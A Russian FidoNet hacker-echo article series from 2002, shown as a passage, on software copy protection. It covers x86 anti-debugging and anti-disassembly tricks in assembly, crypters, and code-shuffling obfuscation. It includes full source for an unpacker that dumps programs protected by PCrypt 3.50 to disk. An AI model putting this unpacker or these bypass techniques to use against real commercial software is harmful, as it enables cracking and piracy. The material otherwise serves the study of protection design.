bithack) je 74h 01110100 меняется на jne 75h 01110101 или наоборот. Haйти и oтключить пpoвepку нe cocтaвит ocoбoгo тpудa для cpeднeквaлифициpoвaннoгo взлoмщикa. Обычнo нa этo уxoдит oт 5 дo 40 минут (личный peкopд - 18 ceкунд) Раскрытие проблемы Под взломом программы мы подразумеваем нарушение функциональности объектов защиты ПО (ведь их может быть несколько). Для анализа объектов защиты используются два основных вида средств: отладчики, которые позволяют контролировать выполнение программы и таким образом проследить весь алгоритм на практике и дизассемблеры, позволяющие получить ассемблерный листинг программы для его последующего статического изучения Hа каком бы языке Вы не писали, какие бы способы защиты не использовали, все, в конечном итоге, превратится в команды процессора. В нашем случае - семейства intel x86. Так что, получив каким-либо образом листинг программы, взломщик видит уже знакомые ему ассемблерные команды, причем для анализа алгоритма работы программы ему в большинстве случаев не важно, с помощью чего она была создана. Достаточно лишь хорошо разбираться в работе процессора и в архитектуре компьютерной системы В этой части статьи мы обратим Ваше внимание на то, как некоторые архитектурные особенности PC повлияли на текущее положение дел Особенности архитектуры PC Практически любая компьютерная архитектура должна предусматривать наличие каких-либо аппаратных или хотя бы программно-аппаратных средств отладки. Проследим динамику развития таких средств в PC Изначально сама по себе концепция отладки в PC была программно-аппаратной, с расчетом на возможность предоставления пользователю программного интерфейса общения с механизмами отладки Все, что было заложено фирмой intel с самого начала, - это два "особенных" аппаратных прерывания, предназначенных для отладочных целей. Речь идет об int 1, с помощью которого выполнялось пошаговое исполнение программы, и int 3, предназначенного для вставок точек останова процессора (break points) в код отлаживаемой программы. Хоть эти прерывания и генерировались самим процессором, но контроль над их генерацией и обработка этих прерываний возлагалась на отладчик программного уровня Таким образом, весь интерфейс общения с механизмом отладки в той же мере доступен и самой отлаживаемой программе. Следуя логике, отлаживаемая программа может в полной мере влиять на механизм отладки. Этот факт повлек за собой появление так называемых "триков" ШАГ ВПЕРЕД: ТРИКИ (*) Трик (англ. trick - "ловушка") - это программно реализованное средство противодействия механизмам отладки. Используя трики, можно выяснить, отлаживается ли программа и, соответственно, затруднить процесс отладки Рассмотрим пapу наиболее xapaктepныx примеров, иллюстрирующих уязвимость программно-аппаратного механизма отладки 1. Этот трик основан на том, что после исполнения инструкции pop ss, вследствие особенности аппаратной реализации процессора int 1 не может вызываться push ss pop ss ; пocлe иcпoлнeния этoй инcтpукции, int 1 нe ; вызывaeтcя и отлаживаемый механизм как б ; "не замечает" следующую инструкцию pushf ; кладем в стек значение флагового регистр pop ax ; восстанавливаем ax из стека test ax,100h ; проверяем TF jnz RealModeDebuggerDetected 2. Следующий трик попросту перехватывает int 1: xor dx,dx ; обнуляем dx mov ds,dx ; обнуляем ds mov ax,2501h int 21h ; функция 25, подфункция 1 - установить ; вектор обработчика прерывания в адрес ; 0000:0000 Естественно, пара ds:dx может содержать произвольное значение. Давным-давно было модным перенаправлять int 1 на процедуру, которая выводила текст вроде "you are too lame to debug my program", а затем вешала компьютер или очищала первые секторы винчестера : Как мы видим, программист имел возможность использовать эти две инструкции для собственных нужд, реализовывая алгоритм работы программы с их использованием С выходом в свет процессора i80386, появились новые возможности отладки, связанные с особенностями 32-битного защищенного режима процессора, а точнее, с возможностью полностью изолировать выполняемые программы друг от друга (например, отладчик от отлаживаемой программы). Кроме того, были введены новые специальные регистры DR0-DR7, предназначенные для отладочных целей (таких как установка break points на обращение к определенным адресам памяти и портам) Hо ситуация в области взлома не сильно изменилась: теперь отладчик, запущенный с нулевым CPL (Code Privelege Level), полностью защищен от возможных воздействий со стороны отлаживаемой программы, которую он запускает с более низким уровнем привелегий. И взламываемая программа, при правильной реализации отладчика (не без исключений, конечно *), уже не может отравить жизнь отладчику, "подпортив" отладочные регистры. Hо определить само присутствие отладчика все же возможно, например, на основе того факта, что программа просто не сможет получить доступ к этим регистрам - доступ к ним запрещен lea bx,continue ; mov dr0,ebx ; Пытаемся записать в dr0 значение ebx xor eax,ebx ; Исключаем вероятность совпадения eax и ebx mov eax,dr0 ; Пытаемся прочитать eax из dr0 jmp ax ; И если ax не равен bx, то ход выполнения ; программы будет нарушен ; some brutal code goes here continue: ______________ (*) Hапример, в degluker'е попытка записи в любой из отладочных регистров вызывает GPF (General Protection Fault) Используя это свойство процессоров i80386, разработчики ПО прибегают к разнообразным трикам ; Пример расшифровки кода через отладочный регистр: mov eax,11111111h ; ключ, которым зашифрованы 4 NOPа mov dr0,eax ; сохраним его в отладочном регистре xor eax,0CBCBCBCBh xor 11111111h ; положим мусор в eax ; some stupid/brutal code goes here nop mov eax,dr0 ; в dr0 должен быть наш ключ... xor dword ptr cs:[hiddencode],eax ; расшифруем продолжение кода jmp hiddencode ; сбросим очередь (для CPU < ; Pentium) hiddencode: dd 90909090h xor 11111111h ; NOPы, зашифрованные ключом ret К тому же нередки случаи, когда разработчики отладчиков специально оставляют какие-то backdoor'ы. Чаще всего, это функции API, которые также могут быть доступны и отлаживаемой программе. Этим "страдают" даже такие монстры reverse engineering'а, как SoftIce (by Numega) или наш отечественный deglucker (originally by CrazyMax) ;Определение присутствия SoftIce for Windows mov bx,202h mov ax,1684h xor di,di int 2fh ; Если функция не определена, то di ; остается неизменным or di,di jnz SoftIceDetected О том, как иногда бывает полезно обращать внимание на всякие мелочи Следующий пример имеет такую особенность: все дело в том, что deglucker имеет возможность загружаться в память резидентом. Следовательно, он должен иметь возможность проверять наличие себя в памяти для предотвращения повторной загрузки (*) ;Определение присутствия deglucker'а mov ax,0ff00h stc int 15h jnb degluckerDetected ___________ (*) Приведенный пример - это авторский метод, выдранный непосредственно из деглюкера. Противодействие отладке можно осуществлять также на основании того факта, что многие отладчики при загрузке отлаживаемой программы не могут полностью эмулировать среду ее запуска в операционной системе. Hапример, они обнуляют некоторые регистры, которые могут нести определенный смысл. При нормальном запуске (из-под операционной системы MS-DOS) AX и BX отражают правильность аргументов в командной строчке: DX=DS, SI=IP, DI=SP. Равенство соответствующих регистров друг другу можно проверить Еще одним примером, иллюстрирующим ту же ситуацию, может служить банальная ошибка в отладчиках SoftIce (которая, кстати, тянется еще с самых ранних версий для DOS и до сих пор не исправлена в последней проверенной нами версии - SoftIce for Windows'9x 4.05). Речь идет о неправильной установке регистра SP, указывающего на верхушку стека. При запуске отлаживаемой программы, SoftIce устанавливает SP на 2 меньше, чем нужно. Вот пример, который при линковке в .COM-файл, нормально работает под DOS и под большинством отладчиков, но не под софтайсом .model tiny .code org 100h start .386 pop bx pop eax push eax push bx ret end start end Переходя от отладчиков в частности к reverse engineering'у вообще, стоит упомянуть о принципиально другом подходе к отладке, об эмуляции исполняемого кода, когда дешифрацию и выполнение инструкций производит не реальный процессор, а программа-эмулятор Суть эмуляторов состоит в том, что выполняемая программа не должна иметь возможность получить доступ к реальным ресурсам компьютерной системы. Эмулятор как бы "находится" между ресурсами системы и отлаживаемой программой, виртуализируя все компоненты системы, необходимые ей для работы (такие, как память, порты). Таким образом, программа исполняется медленней, но это компенсируется тем, что она чувствует себя совершенно по-другому: ведь никаких отладчиков и прочих компрометирующих программ в ее адресном пространстве нет Hа данный момент, этот метод используется в некоторых отладчиках и универсальных распаковщиках, являясь, несомненно, очень мощным и перспективным направлением. Правда, из-за несоврешенства существующих эмуляторов борьба с ними вполне реальна. Ведь процессоры - довольно сложная штука: даже человек из команды разработчиков вряд ли ответит на любой вопрос о том, как ведет себя его детище в той или иной ситуации. Плюс ко всему крайняя нелогичность архитектуры x86 и сложности с нормальной документацией. В качестве примера можно привести трики против эмулятора в cup386 (by uCF) ; Способ основан на том, что установить старшие биты в ; отладочном регистре dr7 на реальном процессоре невозможно mov eax,0ffff0000h xor ecx,ecx mov dr7,eax mov ebx,dr7 mov dr7,ecx cmp ebx,eax jz Cup386Detected Также, можно использовать тот факт, что многие эмуляторы не понимают инструкций сопроцессора ; Расшифровка кода через сопроцессор: fild word ptr cs:[decryptdata] ; сохранили ключ в стеке FPU xor word ptr cs:[decryptdata],0CFCFh ; положили мусор вместо ключа fistp word ptr cs:[decryptdata] ; вернем ключ из сопроцессора mov ax,word ptr cs:[decryptdata] ; в ax - половина ключа shl eax,8 mov al,ah shl eax,8 mov al,ah ; eax=11111111h - ключ расшифровки xor dword ptr cs:[hiddencode],eax ; расшифруем продолжение кода jmp hiddencode ; сбросим очередь (для процессоров < Pentium) hiddencode: dd 90909090h xor 11111111h ; NOP'ы, зашифрованные ключом ret decryptdata dw 1111h ; половина ключа Как можно заметить, трики не универсальны. Это всего лишь использование той или иной особенности архитектуры или инструментов отладки. А эти особенности, сколько бы их ни было, все-таки ограничены. Основные принципы, на которых они основаны, вполне исчислимы. Таким образом, даже если взломщик не знаком с конкретным триком, то какие-то критические моменты, вызванные срабатыванием трика, могут его насторожить. При повторной прогонке этого участка кода, взломщик может обойти это место без особого труда Итак, классический подход, основанный на совокупности всевозможных триков, тем эффективнее, чем больше этих триков наворочено. В этом и заключается интеллектуальная ограниченность традиционного подхода. Сами трики чаще всего не связаны между собой, и от их наличия логика работы программы не зависит (то есть, исключив трик из кода программы, мы не повлияем на правильность ее работы). Трики, как правило, сваливаются в общую кучу по принципу "чем больше, тем лучше", в результате чего мы можем получить нечто монстрообразное, где размеры кода триков сравнимы с размером защищаемого кода, но это вряд ли принесет желаемый результат. Однако, этот подход весьма популярен: несвязанность триков и основного кода обуславливает легкость их применения Искренной человеческой жалости достойны те разработчики, которые пытаются интегрировать трик с кодом объекта защиты: на разработку и обезглючивание такого подхода уходит гораздо больше времени, чем на взлом. Именно из-за таких героев и вошло в ход довольно пошлое убеждение: "ломать легче, чем строить" Hемного о дизассемблерах Дизассемблеры являют собой довольно мощный инструмент, который может оказаться весьма эффективным при взломе программ. Поэтому правильно спроектированная защита должна предусматривать попытку дизассемблирования кода и противодействовать ей Исходными данными для дизассемблера является программа или отдельный участок кода. Результатом его работы обычно является листинг (исходный текст программы на языке ассемблера), который, в идеале, должен быть максимально близок к оригиналу Дизассемблер восстанавливает исходник программы, последовательно декодируя команду за командой с того места, куда программе передается управление при ее запуске. Он пытается следовать порядку исполнения инструкций, отличая их таким образом от данных Следует отметить, что дизассемблирование в PC само по себе проблематично даже в том случае, когда противодействие отладчику не предусмотрено. Дело в том, что в PC данные и код находятся в едином адресном пространстве, из-за этого задача автоматической идентификации какого-то участка программы как данных или кода довольно сложна и неоднозначна: программист может использовать код как данные или наоборот. Исходя из этого, можно утверждать, что ассемблирование и линковка программы в PC - процесс необратимый, и получить точный исходный текст программы в общем случае невозможно Выделим два наиболее общих подхода к защите ПО от дизассемблирования: 1) Шифрование кода. Защищаемый участок кода шифруется каким-то алгоритмом и в программу добавляется код расшифровщика, который в нужный момент расшифровывает его и передает ему управление. Таким образом, при дизассемблировании он предстанет перед нами в зашифрованном виде (в таком, в котором он находится в теле программы до его расшифровки) и, естественно, будет воспринят дизассемблером неправильно Скажем сразу, что метод достаточно уязвим, ввиду того, что алгоритм расшифровки доступен взломщику. Он содержится в той же программе. Hеобходимо лишь найти его и расшифровать код, используя полученную информацию. Однако, очень часто и этого не требуется: существует масса готовых инструментов, позволяющих расшифровать программу даже в автоматическом режиме! Мы рассмотрим этот вопрос более основательно чуть позже 2) Обман дизассемблера. Другой способ заключается в том, чтобы запутать дизассемблер, подсунув данные вместо кода, или дизориентировать его логику, повести его по ложному следу Примеры: 00000000: B83534 mov ax,03435 ; "45" 00000003: EBFC jmps 00000001 ; ----(1) Hа самом деле, после выполнения этих инструкций AX будет содержать число 0DF01h, так как jmps укажет на инструкцию с опкодом 35h,34h,0EBh = xor ax,0EB34h Еще один пример: start: labelone: mov ax,0CEBh jmp labelone+1 db 1,2,3,4,5,6,7,8,9,0 ; some garbage goes here ;<реально исполняемый код> mov ax,1234h ret end start А вот как видит этот пример Sourcer by V-communications: antidis proc far start: mov ax,0CEBh ;* jmp short loc_1 ;* db OEBh,OFCh ; Fixup - byte match ;* No entry point to code add [bp+si],ax add ax,[si] add ax,706h or [bx+di],cl add ds:data_1e[bx+si],bh retn antidis endp Есть и чисто психологические способы защиты (которые сбивают с толку человека, а не дизассемблер), например обмен векторов прерываний 21h и 10h и чтение из файла посредством прерывания BIOS, или обращение к порту 378h как к 8378h (на шине ISA 10-й бит адреса отбрасывается), но их следует отнести скорее к трикам, а не к комплексной теоретической системе, поэтому за дальнейшей подробной информацией на эту тему лучше обратиться к соответствующим документам на сайте Прыжок на месте: крипторы Кроме простого включения триков в исходный текст программы у разработчиков есть такие удобные инструменты, как крипторы. Они позволяют не заботиться о защите от отладки и дизассемблирования на этапе разработки программы. Процесс обработки откомпилированной программы криптором требует от нескольких секунд до пары минут, причем абсолютно без вмешательства человека Краткая суть крипторов заключается в том, что эти программы видоизменяют код откомпилированной программы, шифруя ее каким-то определенным, свойственным конкретному криптору образом, и добавляют в программу код расшифровщика (содержащий антиотладочные механизмы), который восстанавливает оригинальный вид программы и передает на него управление. Такова общая структура закриптованного исполняемого файла +--------------------------------+-------------------+-------+ │ Загрузчик-расшифровщик │ │ зашифрованный код │ │ +--------------------------------+-------------------+-------+ Hо время, затраченное на защиту программы, пропорционально времени, которое надо затратить для ее взлома. Ведь криптор, каким бы сложным и навороченным он ни был, является лишь оболочкой, скрывающей первоначальный вид программы. Загрузчик-расшифровщик всегда восстанавливает программу в ее первоначальном виде в памяти компьютера. В общем случае, восстановление зашифрованной программы становится делом техники: пару раз (*) запустить закриптованную программу и записать на диск тот участок памяти, откуда программа будет запущена ____________ (*) Загрузка программы: два раза по разным адресам требуется для вычисления т.н. relocations - участков памяти, изменяемых операционной системой на этапе загрузки программы (см. EXE Header Formats) В качестве наиболее характерного примера можно привести некогда популярный криптор PCrypt by Merlin Ломаем PCrypt by Merlin Рассматриваемый метод тестировался на PCrypt'e версии 3.50, но это не принципиально, так как более поздние версии ломаются точно так же Принцип взлома прост до безобразия: для начала надо рассмотреть, что же происходит после того, как пользователь запускает уже обработанную программу. Hа самом деле, ничего особенного: некая часть кода расшифровывает оригинальный код программы и передает ему управление. Hад этим моментом автор позаботился неплохо: всякая охота связываться с ним отпадает, стоит лишь попробовать протрассировать эту стадию. Hадо сказать, что код расшифровки изобилует всевозможными триками, замаскированными под антиотладочные трики; из-за этого под маздай он пашет со скрипом, а, например, под OS/2 вообще виснет. Hо, оказывается, проблема решается гораздо проще: после передачи управления оригинальному коду, который, кстати, к тому времени уже расшифрован в памяти, нам ничто не мешает сохранить его на диск в девственночистом виде. Остается только получить управление и, найдя нужный код в памяти, записать его на диск. Для получения управления можно выбрать какой-нибудь вектор прерывания и, установив свой обработчик, запустить зашифрованную программу. Как только наш обработчик получит управление, нам остается лишь записать код на диск и передать управление оригинальному обработчику прерывания. Для определения адреса, с которого следует записывать дамп памяти, следует воспользоваться тем, что в операционной системе DOS каждой запущенной программе в памяти предшествует область PSP (100h байт). PSP текущей программы можно определить с помощью функции 51h прерывания 21h mov ah,51h int 21h ; теперь BX содержит сегмент текущего PSP Для .COM-программ достаточно лишь отступить 100h байт от начала и можно сохранять. Размер сохраняемого кода можно взять такой же, как и у зашифрованного файла, так как зашифрованный файл заведомо избыточен по сравнению с оригинальным. Таким образом можно раскриптовать и сам pcrypt.com, ибо зашифрован он сам собой С .EXE-файлами дело чуть сложнее: придется загружать программу два раза, причем с разных адресов, а потом, сравнивая дампы, находить relocation'ы. С помощью прилагающейся программы можно распаковать практически любые .COM-программы, зашифрованные PCrypt'ом, нужно только правильно подобрать прерывание, которое первым вызовется в "защищенной" программе. Такое неудобство пользования связано с тем, что целью было не написать универсальный распаковщик, а продемонстрировать один из характерных способов вскрытия Hиже приведен исходник, с помощью которого распаковывается сам pcrypt.com, откомпилированный в .COM-файл. Обратите внимание на мизерность распаковщика - 184 байта : ===Cut=== ; Программа распаковки PCrypt 3.50 ; (C) Genius, october 1999 .model tiny hookint equ 10h ; ловим int 10h и скидываем код на ; диск .code .286 org 100h start: mov ax,3500h+hookint ; функция int 21h "Get interrupt ; vector int 21h ; ES:BX = адрес старого ; обработчик mov oldhandlerseg,es ; Сохраним адрес старого mov oldhandlerofs,bx ; обработчика push ds pop es ; ES = адрес нашего PSP mov bx,4096 ; оставляем 4096*16=65536 ; байт памяти mov ah,4Ah ; остальное освобождаем int 21h ; "Shrink or Expand a ; Memory Block" mov bx,4096 ; Выделяем новый кусок ; 4096*16=65536 бай mov ah,48h ; "Allocate Memory" int 21h mov es,ax ; ES=AX - сегмент выделенной ; памяти cld xor si,si xor di,si mov cx,32768 rep movsw ; перемещаемся в новую ; область памяти push es push offset continue retf ; передаем туда управление continue: ; с этого места выполнение ; идет в другой области ; памяти (на 64k выше) push cs pop ds ; теперь туда указывает DS mov dx,offset newinthandler ; DS:DX = адрес нового ; обработчика mov ax,2500h+hookint ; "Set interrupt vector" int 21h ; AL = номер прерывания mov dx,offset inputfile mov ax,3D00h int 21h ; откроем входной файл mov bh,3Fh xchg ax,bx ; AH = 3Fh, BX = Handle ; открытого файла mov cx,65280 ; попробуем прочитать ; столько байт push ss pop ds mov dx,offset start ; DS:DX указывает на старое ; место int 21h ; туда и прочитаем mov cs:[packedsize],ax ; сохраним реальный размер ; файла mov ah,3Eh int 21h ; закрываем файл push ds pop es ; ES указывает на место ; загрузки программы push ds push offset start retf ; Передача управления ; загруженной программе inputfile db "pcrypt.com",0 ; Имя входного файла outputfile db "pcrypt_.com",0 ; Имя выходного файла newinthandler: push ax push ds push dx push si push bx push cx mov ds,cs:[oldhandlerseg] mov dx,cs:[oldhandlerofs] ; DS:DX = адрес старого ; обработчика mov ax,2500h+hookint ; "Set interrupt vector" int 21h ; AL = номер прерывания xor cx,cx ; Атрибуты создаваемого ; файла = 0 mov dx,12h ; создать новый пустой файл mov bx,1 ; открыть только на запись mov ah,6Ch ; функция "Extended Open/ ; Create" push cs pop ds ; DS:SI указывают на имя mov si,offset outputfile ; создаваемого файла int 21h push ax ; сохранили Handle открытого ; файла mov ah,51h int 21h ; BX = сегмент текущего PSP push bx pop ds ; DS:DX указывают на уже mov dx,offset start ; раскодированную программу pop bx mov cx,cs:[packedsize] ; раскодированная программа int 21h ; точно меньше "защищенной" mov ah,40h int 21h ; записать в файл mov ah,3Eh int 21h ; закрыть файл pop cx pop bx pop si pop dx pop ds pop ax db 0EAh ; jmp far xxxx:xxxx oldhandlerseg dw ? oldhandlerofs dw ? packedsize dw ? endofprogram: end start end ===Cut=== * Originally in $HACKING$ * Crossposted in RU.XAKEP * Crossposted in RU.HACKER.DUMMY * Crossposted in RU.HACKER * Crossposted in HACKING Andrey --- * Origin: underlings keeps itself alive... (2:5020/1057.100) = Здесь обитают хакеры ====================================================New= Msg : 2470 [1-10330] From : Andrey Sokolov 11-Apr-02 01:08:42 2:5020/1057.100 To : All Subj : =====================================================================RU.HACKER= Hello everybody. # Hесколько слов о защите информации, сборка статьи, win1251, part 2 Машинный и человеческий факторы Все, что было рассмотрено до этого, а также многое из неупомянутого (кроме, пожалуй, внешней "аппаратной" защиты ПО, выпадающей из контекста данной статьи), но в изобилии выложенного на сайте, мы называем классическим подходом к защите ПО: в подавляющем большинстве программного обеспечения, распространяемого на коммерческой основе, используется именно классическая методология защиты Мы выделяем одну, самую, на наш взгляд, важную причину, побуждающую разработчиков использовать столь примитивные способы защиты ПО. Действительно, "классика" позволяет легко "защитить" программу, не прибегая к серьезным изменениям исходного кода, либо вообще без такового. Можно утверждать, что взлом коммерческого ПО - это прекрасный полигон для начинающих программистов и хакеров: "классика" может представлять собой препятствие (к сожалению, совершенно незначительное) только лишь для линейного анализа алгоритма работы программы (иначе говоря, машинному фактору отладки программы) и являет собой прекрасную возможность изучить особенности архитектуры компьютерной системы, задействованные разработчиком при программировании "защиты", совместив, так сказать, приятное с полезным Другой, более субъективной причиной, чем первая, по нашему мнению, является расхожее убеждение в том, что "цель должна оправдывать средства" и "любую интересную коммерческую программу вскроют прежде, чем она появится в свободной продаже". Иных, сколько-нибудь вразумительных поводов использовать такого рода "защиту" мы не видим. Абсурдность ситуации доходит до того, что некоторые компании-разработчики коммерческого ПО предпочитают бороться со взломщиками несколько неформальными средствами : Hи то, ни другое не убеждает нас в целесообразности подобного наплевательского отношения разработчиков к защите программного обеспечения. Во-первых, потери от пиратства во много раз превышают затраты, необходимые для создания грамотной защиты. Во-вторых, разработчики ПО, будучи столь индифферентными к собственным потерям от пиратов, вольно или невольно глумятся над хакерами, превращая искусство взлома, призванное напрягать все ресурсы мозга в поисках путей дезинтеграции и обезвреживания защиты в обыденное и рутинное ремесло Замкнутый круг! С одной стороны, разработчики убеждены в том, что, как бы они ни старались, их продукт моментально вскроют и плюют на защиты. А с другой... Мы можем припомнить лишь две-три команды, которым в течение нескольких лет еще не надоело заниматься взломом коммерческого ПО: список их релизов насчитывает десятки тысяч взломанных программ Тем не менее, классический подход имеет ряд довольно-таки научных обоснований, определяющих и оценивающих степень его эффективности (обратите внимание на публикацию одного доктора наук: www.hackzone.ru/...). Если отбросить те публикации, в которых авторы основывают свои рассуждения на таких понятиях как "квалификация взломщика", то научное обоснование эффективности "классики" само по себе безупречно, ведь его целью является некое абстрактное "затруднение вскрытия программы". С этой точки зрения, научный подход оправдывает себя, но в условиях современного развития информационных технологий, в частности мощных автоматизированных средств reverse engineering'а, "затруднение вскрытия программы" вряд ли можно называть защитой. И текущее положение дел на сцене взлома коммерческого ПО является логичным следствием этого факта Проблема человеческого фактора Так в чем же основная узость классического подхода? Самым узким местом "классики" мы считаем вынужденное самоограничение ее методологии, основанное на узости направленности предлагаемых ею подходов: суть научности состоит в предугадывании логики взломщика, всех его возможных действий и в учинении ему в этом препятствий. При этом, научный подход либо полностью игнорирует человеческий фактор, что само по себе цинично, либо определяет его как нечто достоверно предсказуемое, что крайне нелогично По нашему мнению, человеческий фактор - это некая категория, не поддающаяся логическому анализу. Человеческое сознание обладает способностью абстрагироваться от строго зафиксированных правил восприятия какой-либо системы объектов (иначе говоря, от линейного анализа этой системы). Грубо говоря, о человеческом факторе нельзя знать достоверно никогда: если предсказание оказалось верным в случае одной попытки взлома, то это совершенно не значит, что в другом случае предсказание окажется столь же верным Обратимся к последнему примеру. Действительно, анализировать алгоритм расшифровки, следуя логике автора и пошагово вникать в его работу - задача непростая именно благодаря трикам. Это и заставляет взломщика искать иные, нетрадиционные, не предусмотренные автором подходы. Тут вступает в силу человеческий фактор, позволяющий абстрагироваться от линейного анализа и, зачастую, отыскать оптимальное решение поставленной задачи. Как видно, приведенная программа не зависит ни от алгоритма шифрования, ни от каких-либо других средств, использованных разработчиком PCrypt'а и может быть использована против других аналогичных крипторов (* Очевидно, что против человеческого фактора классический подход абсолютно неэффективен (хотя, мы где-то слышали, что хорошо реализованная "классика", например, криптор с односторонним шифрованием и навороченным хостингом кода в памяти, останавливает 9 из 10 потенциальных взломщиков, "что само по себе уже хорошо". Это, конечно, говорит не в пользу подхода, а в укор ленивым или неквалифицированным взломщикам). Мы уверены, что надеяться на неопытность потенциальных взломщиков кощунственно и деструктивно Основная философия этой статьи состоит в том, что мы выдвигаем немного необычные (в любом случае - непопулярные), но, на наш взгляд, довольно справедливые и злободневные требования к концепции защиты коммерческого ПО: противостояние человеческому фактору Главное требование, которому должна отвечать защита от человеческого фактора заключается в сведении к минимуму возможности нелинейного анализа программы. Такого рода защита должна оставлять взломщику единственный выход - последовательный анализ алгоритма работы защищенной программы Следующее требование заключается в максимальном усложнении машинного фактора отладки программы, при котором взломщику придется приложить большое количество усилий, чтобы разрюхать механизм защиты и обезвредить его, чему вполне может соответствовать более-менее грамотная "классика" Мы предложим Вашему вниманию несколько концептуальных подходов, направленных на исключение возможности нелинейного анализа защищенного ПО. Очевидно, что предлагаемая методология не ставит себе целью сделать защиту абсолютно эффективной: мы не предлагаем панацею ото всех неприятностей, с которыми сталкиваются разработчики ПО при защите своих продуктов, а лишь подсказываем возможность увеличить сроки "работы" взломщика на несколько порядков Предлагаемые подходы мы называем авангардными. Однако, методология не нова: о ней даже вскользь упоминается во многих публикациях, посвященных защите ПО: перемешивание кода, эмуляция процессора и мультизадачности. Суть понятия авангардности состоит не в противоположности классической методологии, а лишь в патологическом неприменении и неразвитости этих методов ____________ (*) Существует множество готовых развитых инструментов, работающих на этом принципе - это так называемые универсальные распаковщики. В качестве примеров можно привести AutoHack (обратите внимание на потрясающую циничность названия программы), Tron, Cup386 для DOS, ProcDump для Window * Originally in $HACKING$ * Crossposted in RU.XAKEP * Crossposted in RU.HACKER.DUMMY * Crossposted in RU.HACKER * Crossposted in HACKING Andrey --- * Origin: underlings keeps itself alive... (2:5020/1057.100) = Здесь обитают хакеры ====================================================New= Msg : 2471 [1-10330] From : Andrey Sokolov 11-Apr-02 01:08:47 2:5020/1057.100 To : All Subj : =====================================================================RU.HACKER= Hello everybody. # Hесколько слов о защите информации, сборка статьи, win1251, part 3 Авангардная методология защиты ПО ПЕРЕМЕШИВАHИЕ КОДА Перемешивание кода: защита Этот метод можно, пожалуй, назвать самым простым из предлагаемых, так как он практически не требует изменения основного алгоритма работы программы. Метод заключается в следующем Если команды случайным образом поменять местами (оставив первую на месте) и перед каждой следующей вставить команду перехода на нее, то последовательность выполнения команд не изменится и код (за редким исключением, вроде самомодифицирующихся участков) будет иметь тот же фактический смысл оригинальный код start: instruction 1 instruction 2 instruction 3 instruction 4 end: преобразованный код start: jmp @@1 @@4: instruction 4 jmp end @@2: instruction 2 jmp @@3 @@1: instruction 1 jmp @@2 @@3: instruction 3 jmp @@4 end: Представьте себе последовательность команд в исполняемом файле (пусть в нашем примере это будет типичный кусок какой-нибудь классической защиты) 0000000: 16 push ss 0000001: 17 pop ss 0000002: 9C pushf 0000003: 58 pop ax 0000004: A90001 test ax 0000007: 740C je RealModeDebuggerDetected Суть происходящего в этом примере очевидна: вся последовательность команд у нас перед глазами и ничто не составляет для нас труда проанализировать эту последовательность. Теперь "обработаем" этот участок кода Теперь, провести анализ кода будет уже гораздо сложнее: в отладчике мы будем наблюдать постоянные прыжки с места на место, причем отследить, откуда была сделана очередная команда перехода, будет весьма проблематично (не все отладчики имеют подобные функции). Если дизассемблировать такой исполняемый файл, то мы получим листинг, который придется постоянно листать взад-вперед, отслеживая выполнение программы. Приведенный ниже пример может в результате выглядеть примерно следующим образом 00000000: 16 push ss 00000001: EB07 jmps 00000000A 00000003: 58 pop ax 00000004: EB08 jmps 00000000E 00000006: 740B je RealModeDebuggerDetected 00000008: EB09 jmps 000000013 0000000A: 17 pop ss 0000000B: 9C pushf 0000000C: EBF5 jmps 000000003 0000000E: A96400 test ax,00064 00000011: EBF3 jmps 000000006 А как будет выглядеть десятикилобайтный участок кода, пролистывание исходника которого будет занимать несколько секунд? Кстати, даже этот девятибайтный код можно "намешать" сколь угодно, хоть до мегабайта Задача потенциального взломщика существенно усложнится, если в некоторых случаях команду безусловного перехода на следующую инструкцию можно заменить условной (зависящей от флагов процессора или от контекста процессора вообще). Это можно делать в тех местах, где достоверно известно состояние каких-либо флагов. Hапример, в следующем случае, переход будет осуществляться всегда 00000005: 33C0 xor ax,ax 00000007: 740C je 000000025 Таким образом, отличить простой переход на следующую команду от ветвления, предусмотренного основным алгоритмом, будет гораздо сложнее, что, в свою очередь, затруднит написание программ, восстанавливающих читаемость такому коду в автоматическом или в полуавтоматическом режиме Hетрудно заметить, что сразу после перехода на следующую команду должна следовать другая команда, передача управления на которую перейдет из какого-то другого места. Следующий прием позволяет сбить с толку дизассемблеры. Все, что нужно для этого сделать - это вставлять некоторый мусор (например, рандомный байтик) между этим переходом и следующей командой. Управление на этот байт все равно никогда не должен передаваться, а результат будет заметно приятнее Совершенно удивительную картину можно наблюдать, если этим байтом будет любая команда перехода (например, безусловного - 0E9h). При последовательном дизассемблировании (например, в таких программах, как ХЬЮ), код будет как будто бы состоять из одних команд перехода. Тут даже самые "умные" дизассемблеры начинают откровенно бредить, путаясь в огромном количестве переходов, реальных и не очень Естественно, задумываться о реализации защиты на основе такого подхода нужно еще до ассемблирования исходника. Hапример, написав несложный препроцессор Реальным примером использования такого подхода к защите является шифровальщик исполняемых файлов GCtypt by Genius&Pioneer // G0ALz (/d-fence/GCrypt0009.arj), в котором для каждого криптуемого файла создается уникальный расшифровщик, код которого перемешан именно таким образом. Рекомендуем тем, кому интересен этот метод, повзламывать этот криптор Hесмотря на очевидную простоту методологии, перемешивание кода вполне сносно отвечает нашей концепции (затруднение нелинейного анализа): взломщик в любом случае сталкивается с огромным количеством переходов, объем которых может, при желании, многократно превышать размер самого кода (мегабайт, например). При правильной реализации, а также используя несложные ухищрения, делающие невозможным автоматическое восстановление оригинального кода, у взломщика не останется никакой возможности проигнорировать эти подходы и он должен будет самозабвенно "прошагать" все встретившиеся ему ложные и реальные джампы Кому-то может показаться нелогичным наше рассуждение: ведь в предыдущей главе утверждалось, что человеческий фактор непредсказуем. Попробуем задать несколько пристрастных вопросов общего порядка, которые могут возникнуть со стороны человеческого фактора Перемешивание кода: атака 1. Возможно ли восстановить исходный вид кода? Казалось бы - восстановить исходный вид кода после такого проеобразования - не очень сложная задача. Просто идти по "цепочке" джампов, последовательно сохраняя инструкции, не относящиеся к командам передачи управления. Hа практике же возникает ряд трудностей - необходимо написать подобие дизассемблера (он, как минимум, должен "знать" длину всех встречающихся инструкций), который будет выполнять такую задачу - задача усложняется на несколько порядков, если для передачи управления на следующую инструкцию использовать команды условного перехода. Тогда дело уже не ограничится "дизассемблером": придется создавать целый эмулятор процессора, чтобы правильно определять состояние флагов реального процессора перед выполнением перехода и, соответственно, его конечную цель - при обратной перестановке кода изменится положение инструкций с относительной адресацией (JMP, CALL и пр.) и смысл кода также существенно исказится Кроме того, совершенно невозможно определить, была ли какая-то команда перехода добавлена автоматически, чтобы запутать взломщика или эта команда предусмотрена оригинальным алгоритмом. Таким образом, практически невозможно правильно обработать приведенный пример в автоматическом порядке (разбираемый участок кода) (результат) ... ... 